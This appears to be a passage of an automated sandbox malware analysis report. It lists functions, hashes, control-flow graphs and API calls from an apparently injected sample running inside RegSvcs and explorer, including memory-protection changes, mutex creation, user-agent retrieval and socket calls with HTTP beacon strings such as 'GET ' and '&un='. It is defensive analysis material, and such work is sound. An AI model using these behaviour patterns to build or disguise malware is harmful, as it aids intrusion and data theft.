                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F9D7B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RtlDebugPrintTimes.NTDLL ref: 00F9D959
                                                                                              • Part of subcall function 00F74859: RtlDebugPrintTimes.NTDLL ref: 00F748F7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID: $$$
                                                                                            • API String ID: 3446177414-233714265
                                                                                            • Opcode ID: 5cb68574ff63217bb17a318f0cb60be840c285c5d2b61a2799007670f7d6f957
                                                                                            • Instruction ID: 4fe80b09db7b2b3dd9801995ef0f671784c6e7fed5fd07d805bd8b3a79f1ae06
                                                                                            • Opcode Fuzzy Hash: 5cb68574ff63217bb17a318f0cb60be840c285c5d2b61a2799007670f7d6f957
                                                                                            • Instruction Fuzzy Hash: 47512272E00345DFEF24EFA4C9857ADBBB1BF48314F384129D8416B292C779A845EB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FEFD82 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID: $
                                                                                            • API String ID: 3446177414-3993045852
                                                                                            • Opcode ID: c83f46a53dd7d4d301b1ae2cfda67b0c3dc56e40a270ebc2e21afdaeb505c5f5
                                                                                            • Instruction ID: 1c5737381b16263588cb983680eead384e97daf874d69f55ac0cc27c4270d424
                                                                                            • Opcode Fuzzy Hash: c83f46a53dd7d4d301b1ae2cfda67b0c3dc56e40a270ebc2e21afdaeb505c5f5
                                                                                            • Instruction Fuzzy Hash: D9418F75E01248ABCB21DF9AC840AEEBBB5BF48714F140129ED04A7351D775ED15EBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F6DF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID: 0$0
                                                                                            • API String ID: 3446177414-203156872
                                                                                            • Opcode ID: 31ef942004d66bea513107546a1bf6120cb33cd6eeeacdcd5307b74ae60d8405
                                                                                            • Instruction ID: 84251d3c97c1b60ae2729f8599f66d2faf97ec6171bbe094cebd88142bc0d1a4
                                                                                            • Opcode Fuzzy Hash: 31ef942004d66bea513107546a1bf6120cb33cd6eeeacdcd5307b74ae60d8405
                                                                                            • Instruction Fuzzy Hash: 4D416FB2A08706AFC310CF28C544A5ABBE4BF89314F044A2EF589DB341D775E905DF96
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 010220E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: ___swprintf_l
                                                                                            • String ID: [
                                                                                            • API String ID: 48624451-784033777
                                                                                            • Opcode ID: fec2fc5ddfe5cb75eb90b103c62bf09181af38a70566d41a16382a1c5fb69736
                                                                                            • Instruction ID: 872098e31c634487b7bb00f52ee0eead3270d56ff71829f758905bdc604464c5
                                                                                            • Opcode Fuzzy Hash: fec2fc5ddfe5cb75eb90b103c62bf09181af38a70566d41a16382a1c5fb69736
                                                                                            • Instruction Fuzzy Hash: 612183BAE00129ABDB10DEA9CD51EEEBBE8AF54740F140156E945D3201EB34DA019BA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Execution Graph

                                                                                            Execution Coverage:1.5%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:11.4%
                                                                                            Total number of Nodes:79
                                                                                            Total number of Limit Nodes:9
                                                                                            execution_graph 20220 f905e12 20224 f904942 20220->20224 20222 f905e45 NtProtectVirtualMemory 20223 f905e70 20222->20223 20225 f904967 20224->20225 20225->20222 20226 f904f82 20227 f904fb8 20226->20227 20229 f905081 20227->20229 20237 f905022 20227->20237 20238 f9015b2 20227->20238 20230 f905134 20229->20230 20232 f905117 getaddrinfo 20229->20232 20229->20237 20236 f9051b2 20230->20236 20230->20237 20241 f901732 20230->20241 20232->20230 20234 f9057f4 setsockopt recv 20234->20237 20235 f905729 20235->20234 20235->20237 20236->20237 20244 f9016b2 20236->20244 20239 f90160a socket 20238->20239 20240 f9015ec 20238->20240 20239->20229 20240->20239 20242 f901788 connect 20241->20242 20243 f90176a 20241->20243 20242->20236 20243->20242 20245 f901705 send 20244->20245 20246 f9016e7 20244->20246 20245->20235 20246->20245 20247 f8f92dd 20251 f8f931a 20247->20251 20248 f8f93fa 20249 f8f9328 SleepEx 20249->20249 20249->20251 20251->20248 20251->20249 20254 f903f12 7 API calls 20251->20254 20255 f8fa432 NtCreateFile 20251->20255 20256 f8f90f2 6 API calls 20251->20256 20254->20251 20255->20251 20256->20251 20257 f904232 20259 f90425c 20257->20259 20260 f904334 20257->20260 20258 f904410 NtCreateFile 20258->20260 20259->20258 20259->20260 20261 f905bac 20262 f905bb1 20261->20262 20295 f905bb6 20262->20295 20296 f8fbb72 20262->20296 20264 f905c2c 20265 f905c85 20264->20265 20267 f905c54 20264->20267 20268 f905c69 20264->20268 20264->20295 20310 f903ab2 NtProtectVirtualMemory 20265->20310 20306 f903ab2 NtProtectVirtualMemory 20267->20306 20271 f905c80 20268->20271 20272 f905c6e 20268->20272 20269 f905c8d 20311 f8fd102 ObtainUserAgentString NtProtectVirtualMemory 20269->20311 20271->20265 20273 f905c97 20271->20273 20308 f903ab2 NtProtectVirtualMemory 20272->20308 20277 f905c9c 20273->20277 20278 f905cbe 20273->20278 20275 f905c5c 20307 f8fcee2 ObtainUserAgentString NtProtectVirtualMemory 20275->20307 20300 f903ab2 NtProtectVirtualMemory 20277->20300 20282 f905cc7 20278->20282 20283 f905cd9 20278->20283 20278->20295 20280 f905c76 20309 f8fcfc2 ObtainUserAgentString NtProtectVirtualMemory 20280->20309 20312 f903ab2 NtProtectVirtualMemory 20282->20312 20283->20295 20314 f903ab2 NtProtectVirtualMemory 20283->20314 20286 f905ccf 20313 f8fd2f2 ObtainUserAgentString NtProtectVirtualMemory 20286->20313 20288 f905cac 20301 f8fcde2 ObtainUserAgentString 20288->20301 20290 f905ce5 20315 f8fd712 ObtainUserAgentString NtProtectVirtualMemory 20290->20315 20293 f905cb4 20302 f8f9412 20293->20302 20297 f8fbb93 20296->20297 20298 f8fbcb5 CreateMutexW 20297->20298 20299 f8fbcce 20297->20299 20298->20299 20299->20264 20300->20288 20301->20293 20303 f8f9440 20302->20303 20304 f8f9473 20303->20304 20305 f8f944d CreateThread 20303->20305 20304->20295 20305->20295 20306->20275 20307->20295 20308->20280 20309->20295 20310->20269 20311->20295 20312->20286 20313->20295 20314->20290 20315->20295 20316 f8ff8c2 20318 f8ff934 20316->20318 20317 f8ff9a6 20318->20317 20319 f8ff995 ObtainUserAgentString 20318->20319 20319->20317

                                                                                            Executed Functions

                                                                                            Function 0F904F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815networkCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 f904f82-f904fb6 1 f904fd6-f904fd9 0->1 2 f904fb8-f904fbc 0->2 4 f9058fe-f90590c 1->4 5 f904fdf-f904fed 1->5 2->1 3 f904fbe-f904fc2 2->3 3->1 6 f904fc4-f904fc8 3->6 7 f904ff3-f904ff7 5->7 8 f9058f6-f9058f7 5->8 6->1 11 f904fca-f904fce 6->11 9 f904ff9-f904ffd 7->9 10 f904fff-f905000 7->10 8->4 9->10 12 f90500a-f905010 9->12 10->12 11->1 13 f904fd0-f904fd4 11->13 14 f905012-f905020 12->14 15 f90503a-f905060 12->15 13->1 13->5 14->15 16 f905022-f905026 14->16 17 f905062-f905066 15->17 18 f905068-f90507c call f9015b2 15->18 16->8 19 f90502c-f905035 16->19 17->18 20 f9050a8-f9050ab 17->20 22 f905081-f9050a2 18->22 19->8 23 f9050b1-f9050b8 20->23 24 f905144-f905150 20->24 22->20 26 f9058ee-f9058ef 22->26 27 f9050e2-f9050f5 23->27 28 f9050ba-f9050dc call f904942 23->28 25 f905156-f905165 24->25 24->26 30 f905167-f905178 call f901552 25->30 31 f90517f-f90518f 25->31 26->8 27->26 29 f9050fb-f905101 27->29 28->27 29->26 33 f905107-f905109 29->33 30->31 35 f905191-f9051ad call f901732 31->35 36 f9051e5-f90521b 31->36 33->26 40 f90510f-f905111 33->40 47 f9051b2-f9051da 35->47 38 f90522d-f905231 36->38 39 f90521d-f90522b 36->39 44 f905233-f905245 38->44 45 f905247-f90524b 38->45 43 f90527f-f905280 39->43 40->26 46 f905117-f905132 getaddrinfo 40->46 51 f905283-f9052e0 call f905d62 call f902482 call f901e72 call f906002 43->51 44->43 48 f905261-f905265 45->48 49 f90524d-f90525f 45->49 46->24 50 f905134-f90513c 46->50 47->36 52 f9051dc-f9051e1 47->52 53 f905267-f90526b 48->53 54 f90526d-f905279 48->54 49->43 50->24 63 f9052e2-f9052e6 51->63 64 f9052f4-f905354 call f905d92 51->64 52->36 53->51 53->54 54->43 63->64 65 f9052e8-f9052ef call f902042 63->65 69 f90535a-f905396 call f905d62 call f906262 call f906002 64->69 70 f90548c-f9054b8 call f905d62 call f906262 64->70 65->64 84 f905398-f9053b7 call f906262 call f906002 69->84 85 f9053bb-f9053e9 call f906262 * 2 69->85 79 f9054d9-f905590 call f906262 * 3 call f906002 * 2 call f902482 70->79 80 f9054ba-f9054d5 70->80 109 f905595-f9055b9 call f906262 79->109 80->79 84->85 101 f905415-f90541d 85->101 102 f9053eb-f905410 call f906002 call f906262 85->102 105 f905442-f905448 101->105 106 f90541f-f905425 101->106 102->101 105->109 110 f90544e-f905456 105->110 107 f905467-f905487 call f906262 106->107 108 f905427-f90543d 106->108 107->109 108->109 120 f9055d1-f9056ad call f906262 * 7 call f906002 call f905d62 call f906002 call f901e72 call f902042 109->120 121 f9055bb-f9055cc call f906262 call f906002 109->121 110->109 113 f90545c-f90545d 110->113 113->107 132 f9056af-f9056b3 120->132 121->132 135 f9056b5-f9056fa call f901382 call f9017b2 132->135 136 f9056ff-f90572d call f9016b2 132->136 153 f9058e6-f9058e7 135->153 144 f90575d-f905761 136->144 145 f90572f-f905735 136->145 149 f905767-f90576b 144->149 150 f90590d-f905913 144->150 145->144 148 f905737-f90574c 145->148 148->144 154 f90574e-f905754 148->154 157 f905771-f905773 149->157 158 f9058aa-f9058df call f9017b2 149->158 155 f905779-f905784 150->155 156 f905919-f905920 150->156 153->26 154->144 163 f905756 154->163 159 f905795-f905796 155->159 160 f905786-f905793 155->160 156->160 157->155 157->158 158->153 164 f90579c-f9057a0 159->164 160->159 160->164 163->144 167 f9057b1-f9057b2 164->167 168 f9057a2-f9057af 164->168 170 f9057b8-f9057c4 167->170 168->167 168->170 173 f9057f4-f905861 setsockopt recv 170->173 174 f9057c6-f9057ef call f905d92 call f905d62 170->174 177 f9058a3-f9058a4 173->177 178 f905863 173->178 174->173 177->158 178->177 181 f905865-f90586a 178->181 181->177 184 f90586c-f905872 181->184 184->177 186 f905874-f9058a1 184->186 186->177 186->178
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954894231.000000000F880000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f880000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: getaddrinforecvsetsockopt
                                                                                            • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                            • API String ID: 1564272048-1117930895
                                                                                            • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                            • Instruction ID: bef17407b2b72ad21722f2268907fd8b0d5e66400414d5825220a0fd1e267feb
                                                                                            • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                            • Instruction Fuzzy Hash: D5526B30618B088FDB69FB68C4847E9B7E1FB94300F55462ED49BCB1C7EA34A549CB85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F904232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 303 f904232-f904256 304 f90425c-f904260 303->304 305 f9048bd-f9048cd 303->305 304->305 306 f904266-f9042a0 304->306 307 f9042a2-f9042a6 306->307 308 f9042bf 306->308 307->308 309 f9042a8-f9042ac 307->309 310 f9042c6 308->310 311 f9042b4-f9042b8 309->311 312 f9042ae-f9042b2 309->312 313 f9042cb-f9042cf 310->313 311->313 314 f9042ba-f9042bd 311->314 312->310 315 f9042d1-f9042f7 call f904942 313->315 316 f9042f9-f90430b 313->316 314->313 315->316 320 f904378 315->320 316->320 321 f90430d-f904332 316->321 324 f90437a-f9043a0 320->324 322 f9043a1-f9043a8 321->322 323 f904334-f90433b 321->323 327 f9043d5-f9043dc 322->327 328 f9043aa-f9043d3 call f904942 322->328 325 f904366-f904370 323->325 326 f90433d-f904360 call f904942 323->326 325->320 332 f904372-f904373 325->332 326->325 329 f904410-f904458 NtCreateFile call f904172 327->329 330 f9043de-f90440a call f904942 327->330 328->320 328->327 339 f90445d-f90445f 329->339 330->320 330->329 332->320 339->320 340 f904465-f90446d 339->340 340->320 341 f904473-f904476 340->341 342 f904486-f90448d 341->342 343 f904478-f904481 341->343 344 f9044c2-f9044ec 342->344 345 f90448f-f9044b8 call f904942 342->345 343->324 351 f9044f2-f9044f5 344->351 352 f9048ae-f9048b8 344->352 345->320 350 f9044be-f9044bf 345->350 350->344 353 f904604-f904611 351->353 354 f9044fb-f9044fe 351->354 352->320 353->324 355 f904500-f904507 354->355 356 f90455e-f904561 354->356 359 f904538-f904559 355->359 360 f904509-f904532 call f904942 355->360 361 f904616-f904619 356->361 362 f904567-f904572 356->362 366 f9045e9-f9045fa 359->366 360->320 360->359 364 f9046b8-f9046bb 361->364 365 f90461f-f904626 361->365 367 f9045a3-f9045a6 362->367 368 f904574-f90459d call f904942 362->368 370 f904739-f90473c 364->370 371 f9046bd-f9046c4 364->371 373 f904657-f90466b call f905e92 365->373 374 f904628-f904651 call f904942 365->374 366->353 367->320 369 f9045ac-f9045b6 367->369 368->320 368->367 369->320 377 f9045bc-f9045e6 369->377 381 f904742-f904749 370->381 382 f9047c4-f9047c7 370->382 378 f9046f5-f904734 371->378 379 f9046c6-f9046ef call f904942 371->379 373->320 391 f904671-f9046b3 373->391 374->320 374->373 377->366 401 f904894-f9048a9 378->401 379->352 379->378 384 f90477a-f9047bf 381->384 385 f90474b-f904774 call f904942 381->385 382->320 387 f9047cd-f9047d4 382->387 384->401 385->352 385->384 392 f9047d6-f9047f6 call f904942 387->392 393 f9047fc-f904803 387->393 391->324 392->393 399 f904805-f904825 call f904942 393->399 400 f90482b-f904835 393->400 399->400 400->352 402 f904837-f90483e 400->402 401->324 402->352 406 f904840-f904886 402->406 406->401
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954894231.000000000F880000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f880000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID: `
                                                                                            • API String ID: 823142352-2679148245
                                                                                            • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                            • Instruction ID: 840b1aa48dc331b706674e7630162442ebcb98770f5661b721d14152a17b9eaa
                                                                                            • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                            • Instruction Fuzzy Hash: 49224D70A18B099FCB59EF2CC4996AEF7E1FB98301F40462EE55ED7291DB30A451CB81
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F905E12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 447 f905e12-f905e6e call f904942 NtProtectVirtualMemory 450 f905e70-f905e7c 447->450 451 f905e7d-f905e8f 447->451
                                                                                            APIs
                                                                                            • NtProtectVirtualMemory.NTDLL ref: 0F905E67
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954894231.000000000F880000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f880000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProtectVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2706961497-0
                                                                                            • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                            • Instruction ID: cd604fce78c38b1ad4fcfde4283dc33bf373075dbc43eb195dd54d86f675d39c
                                                                                            • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                            • Instruction Fuzzy Hash: 38019E30628B484F8B88EF6CD48412AB7E4FBC9214F000B3EA99AC3291EB64C5414B82
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F905E0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 452 f905e0a-f905e38 453 f905e45-f905e6e NtProtectVirtualMemory 452->453 454 f905e40 call f904942 452->454 455 f905e70-f905e7c 453->455 456 f905e7d-f905e8f 453->456 454->453
                                                                                            APIs
                                                                                            • NtProtectVirtualMemory.NTDLL ref: 0F905E67
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954894231.000000000F880000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f880000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProtectVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2706961497-0
                                                                                            • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                            • Instruction ID: f2e1c3dbc70fff1fa5482bd9fbf51ced00b97ef02594bb1c8fc3e0a646bca377
                                                                                            • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                            • Instruction Fuzzy Hash: EF01A734628B884F8744EB3C94451A6B3E5FBCE314F000B7EE5DAC3251DB25D5014782
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F8FF8C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • ObtainUserAgentString.URLMON ref: 0F8FF9A0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954894231.000000000F880000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f880000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AgentObtainStringUser
                                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                            • API String ID: 2681117516-319646191
                                                                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                            • Instruction ID: d4fe761d934e940772962fadf96030b4dff9b2d28ca23a3289a5d5b386326390
                                                                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                            • Instruction Fuzzy Hash: A131C231614B0C8FCB04EFA8C8487EDB7E0FB98204F44022AD55ED7282DF7886498B89
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F8FF8BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • ObtainUserAgentString.URLMON ref: 0F8FF9A0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954894231.000000000F880000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f880000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AgentObtainStringUser
                                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                            • API String ID: 2681117516-319646191
                                                                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                            • Instruction ID: 4e5377e7d933c06a616e405cd157a69207526cb83b8673aa5d658a3e516ea306
                                                                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                            • Instruction Fuzzy Hash: BB21C331610B0C8ECB04FFA9C8487ED7BB0FF98204F44422AD55AD7292DF789649CB89
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F8FBB66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148synchronizationCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 232 f8fbb66-f8fbb68 233 f8fbb6a-f8fbb6b 232->233 234 f8fbb93-f8fbbb8 232->234 235 f8fbbbe-f8fbc22 call f902612 call f904942 * 2 233->235 236 f8fbb6d-f8fbb71 233->236 237 f8fbbbb-f8fbbbc 234->237 246 f8fbcdc 235->246 247 f8fbc28-f8fbc2b 235->247 236->237 238 f8fbb73-f8fbb92 236->238 237->235 238->234 249 f8fbcde-f8fbcf6 246->249 247->246 248 f8fbc31-f8fbcd3 call f906da4 call f906022 call f9063e2 call f906022 call f9063e2 CreateMutexW 247->248 248->246 263 f8fbcd5-f8fbcda 248->263 263->249
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954894231.000000000F880000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f880000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateMutex
                                                                                            • String ID: .dll$el32$kern
                                                                                            • API String ID: 1964310414-1222553051
                                                                                            • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                            • Instruction ID: 92e37acec3ce8e129e462486f08fb50704f3463444555aa55f270e199c01221b
                                                                                            • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                            • Instruction Fuzzy Hash: 6B415B70918A088FDB54EFA8C8987ED77E0FF98300F44417AD94ADB296DE349945CB85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F8FBB72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138synchronizationCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954894231.000000000F880000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f880000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateMutex
                                                                                            • String ID: .dll$el32$kern
                                                                                            • API String ID: 1964310414-1222553051
                                                                                            • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                            • Instruction ID: e67da64e9b92de309dc80a1c8a085391604c912d28b04c9a5e57820ecf47c85e
                                                                                            • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                            • Instruction Fuzzy Hash: B7413C70918A088FDB54EFA8C498BED77F0FF98300F44417AD94ADB296DE349945CB85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F90172E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 293 f90172e-f901768 294 f901788-f9017ab connect 293->294 295 f90176a-f901782 call f904942 293->295 295->294
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954894231.000000000F880000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f880000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: connect
                                                                                            • String ID: conn$ect
                                                                                            • API String ID: 1959786783-716201944
                                                                                            • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                            • Instruction ID: 2d7c8ea227f0b104c3bf8bc0e5ddda78c6bff592037f221fee7c2c17385f1d59
                                                                                            • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
